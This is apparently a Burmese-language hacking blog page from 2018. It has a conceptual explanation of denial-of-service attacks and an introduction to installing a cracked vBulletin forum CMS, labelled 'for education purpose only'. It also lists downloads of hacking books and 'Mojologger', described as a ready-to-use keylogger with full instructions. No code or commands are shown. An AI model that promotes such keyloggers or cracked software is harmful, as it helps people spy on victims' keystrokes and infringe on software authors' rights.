ေရးသားရာမွာအမွားပါတယ္.... နားမလည္တာဆို ကြ်န္ေတာ္ညံျဖင္းလို ့သာျဖစ္ပါတယ္
Cyko Rat
Saturday, October 20, 2018
DDOS ATTACK
DoS ဆုိတဲ႔ တုိက္ခုိက္မႈဟာ ယေန႔ေခတ္မွာ အင္တာနက္ တုိက္ခုိက္ေရးသမားတုိ႔
အသုံးၿပဳတဲ႔ နည္းလမ္းတစ္ခုလည္းၿဖစ္ပါတယ္.. Denial of Service ဆုိတဲ႔အတုိင္း အတုိက္
ခုိက္ခံရသူရဲ႕ Computer သုိ႔မဟုတ္ Webserver ရဲ႕ Bandwidth , CPU, Memory
အသုံးၿပဳမႈေတြက သာမာန္ေပးစြမ္းႏုိင္တဲ႔ ပမာဏထက္ ပုိၿပီးလုိအပ္တဲ႔အတြက္ Out of Service ေတြ
ၿဖစ္ကုန္တာပါ။ ၾကားၿဖတ္၍ Resource အားလုံးကုိ စားသုံးလုိက္ၿခင္းပဲ ၿဖစ္ပါတယ္။ ထပ္ၿပီး
ရွင္းေအာင္ေၿပာရမယ္ဆုိရင္ ကၽြန္ေတာ္တုိ႔က www.planetcreator.net ဆုိၿပီး Browser
မွာရုိက္ထည့္လုိက္ရင္ ေနာက္မွာ အလုပ္ လုပ္ေပးတာက www.planetcreator.net တင္ထားတဲ႔
Webserver က အလုပ္လုပ္ ေၿဖၾကား၊ ေဖာ္ေဆာင္ေပးရတာၿဖစ္ပါတယ္။ ဒီေတာ့
သာမာန္ေတာင္းဆုိမႈနဲ႔ ပုိတဲ႔ Fade Request ေတြကုိ server ကၿပန္လည္ေၿဖၾကား
ေပးေနရတဲ႔အတြက္ Over Load ၿဖစ္ကာ Server က ဆက္သြယ္မႈရပ္တန္႔သြားရၿခင္းၿဖစ္ပါတယ္။
DoS တုိက္ခုိက္မႈမွာ သတ္မွတ္ထားတဲ႔ Targeted System (Victim) နဲ႔ ၄င္း System ရဲ႕ Port,
network component, firewall ကုိ အတိအက်ေရြးခ်ယ္ တုိက္ခုိက္တာၿဖစ္တဲ႔ အၿပင္ printer ေတြ
Alarm System ေတြၿပတ္ေတာက္သြားေအာင္ တုိက္ခုိက္တာလည္းရွိပါတယ္....
Sunday, October 14, 2018
Saturday, October 13, 2018
Vbulletin Cracked version Installation in localhost
Vbulletin ဆုိတာ လူသုံးမ်ားတဲ့ forum CMS တစ္ခုပါ။ အသုံးမ်ားတဲ့အျပင္ ပုံမွန္ CMS ေတြလုိ
အခမဲ့အသုံးျပဳရတာ မဟုတ္ပဲနဲ ့ အခေၾကးေငြနဲ ့အသုံးျပဳ ရတဲ့ CMS တစ္ခုျဖစ္ပါတယ္။ ကြ်န္ေတာ္ကုိယ္တုိင္လည္း
၀ယ္မသုံးဖူးေပမယ့္ ၀ယ္သုံးဖူးတဲ့သူေတြရဲ ့အဆုိအရ တလကုိ $20 ေလာက္က်သင့္တယ္လုိ ့ ၾကားသိရဖူးပါတယ္။
ကြ်န္ေတာ္သိသေလာက္ VBulletin အသုံးျပဳထားတဲ့ website ေတြကုိ ဥပမာေပးရမယ္ဆုိရင္ေတာ့ ျမန္မာဖုိရမ္ေတြ
ထဲမွာဆုိရင္ေတာ့ http://www.mysteryzillion.org , http://www.mmso.org , http://www.myidgroup.org တုိ
့ျဖစ္ၾကပါတယ္။ vbulletin ကုိ အခေၾကးေငြတစ္စုံတစ္ရာမေပးဘဲ crack လုပ္ျပီးသုံးစြဲ လို ့ရေပမယ့္ မိမိတုိ ့တင္ထားတဲ့
hosting ကသိသြားပါက ဖ်က္ပစ္ျခင္း ေၾကာင့္ေသာ္လည္းေကာင္း software ေရးသားသူရဲ ့ ethic ကုိေလးစားေသာေၾကာင့္
ေသာ္လည္းေကာင္း အသုံးျပဳေလ့မရွိၾကပါဘူး။ သုိ ့ေသာ္ညားလည္း မိမိတုိ ့အိမ္တြင္း local မွာစမ္းသပ္အသုံးျပဳေလ့လာ
သူမ်ားအတြက္မူကာ $20 မွာမ်ားေနႏုိင္ပါတယ္။ ဒါေၾကာင့္ အိမ္တြင္းစမ္းသပ္ အသုံးျပဳမည္ဆုိပါက cracked version
မ်ားကုိအသုံးျပဳစမ္းသပ္ ႏုိင္ပါတယ္။ သုိ ့ေသာ္ညားလည္း စတင္ေလ့လာသူမ်ားအေနနဲ ့ေတာ့ cracked version ကုိ install
လုပ္ျခင္း အနည္းငယ္ရႈပ္ေထြးမည္ျဖစ္သျဖင့္ ဒၤီ tutorial ကုိေရးသားလုိက္ပါတယ္။ (for education purpose only)
Download
အခမဲ့အသုံးျပဳရတာ မဟုတ္ပဲနဲ ့ အခေၾကးေငြနဲ ့အသုံးျပဳ ရတဲ့ CMS တစ္ခုျဖစ္ပါတယ္။ ကြ်န္ေတာ္ကုိယ္တုိင္လည္း
၀ယ္မသုံးဖူးေပမယ့္ ၀ယ္သုံးဖူးတဲ့သူေတြရဲ ့အဆုိအရ တလကုိ $20 ေလာက္က်သင့္တယ္လုိ ့ ၾကားသိရဖူးပါတယ္။
ကြ်န္ေတာ္သိသေလာက္ VBulletin အသုံးျပဳထားတဲ့ website ေတြကုိ ဥပမာေပးရမယ္ဆုိရင္ေတာ့ ျမန္မာဖုိရမ္ေတြ
ထဲမွာဆုိရင္ေတာ့ http://www.mysteryzillion.org , http://www.mmso.org , http://www.myidgroup.org တုိ
့ျဖစ္ၾကပါတယ္။ vbulletin ကုိ အခေၾကးေငြတစ္စုံတစ္ရာမေပးဘဲ crack လုပ္ျပီးသုံးစြဲ လို ့ရေပမယ့္ မိမိတုိ ့တင္ထားတဲ့
hosting ကသိသြားပါက ဖ်က္ပစ္ျခင္း ေၾကာင့္ေသာ္လည္းေကာင္း software ေရးသားသူရဲ ့ ethic ကုိေလးစားေသာေၾကာင့္
ေသာ္လည္းေကာင္း အသုံးျပဳေလ့မရွိၾကပါဘူး။ သုိ ့ေသာ္ညားလည္း မိမိတုိ ့အိမ္တြင္း local မွာစမ္းသပ္အသုံးျပဳေလ့လာ
သူမ်ားအတြက္မူကာ $20 မွာမ်ားေနႏုိင္ပါတယ္။ ဒါေၾကာင့္ အိမ္တြင္းစမ္းသပ္ အသုံးျပဳမည္ဆုိပါက cracked version
မ်ားကုိအသုံးျပဳစမ္းသပ္ ႏုိင္ပါတယ္။ သုိ ့ေသာ္ညားလည္း စတင္ေလ့လာသူမ်ားအေနနဲ ့ေတာ့ cracked version ကုိ install
လုပ္ျခင္း အနည္းငယ္ရႈပ္ေထြးမည္ျဖစ္သျဖင့္ ဒၤီ tutorial ကုိေရးသားလုိက္ပါတယ္။ (for education purpose only)
Download
Gray Hat Hacking
အရမ္းကိုပညာယူစရာေတြမ်ားစြာပါတယ္ စာအုပ္ေကာင္းေလးပါ
အရမ်းကိုပညာယူစရာတွေများစွာပါတယ် စာအုပ်ကောင်းလေးပါ
Download
Mojologger
Keyloggerကိုအဆင္သင့္အသုံးျပဳလို႔ရႏိုင္မယ့္ toolေလးနဲ႔ အသုံးျပဳနည္းအျပည့္အစုံ
Keyloggerကိုအဆင်သင့်အသုံးပြုလို့ရနိုင်မယ့် toolလေးနဲ့ အသုံးပြုနည်းအပြည့်အစုံ
Download
Using Keylogger
Keyloggerကိုဘယ္လိုအသုံးျပဳမလဲဆိုတာ နားလည္ေစဖို႔
Keyloggerကိုဘယ်လိုအသုံးပြုမလဲဆိုတာ နားလည်စေဖို့
Download
System Hacking
Hackingကိုေလ့လာလိုသူမ်ားေဆာင္ထားသင့္စာအုပ္ေလးပါ
Hackingကိုလေ့လာလိုသူများဆောင်ထားသင့်စာအုပ်လေးပါ
Download
Hackingကိုလေ့လာလိုသူများဆောင်ထားသင့်စာအုပ်လေးပါ
Download
Subscribe to:
Posts (Atom)












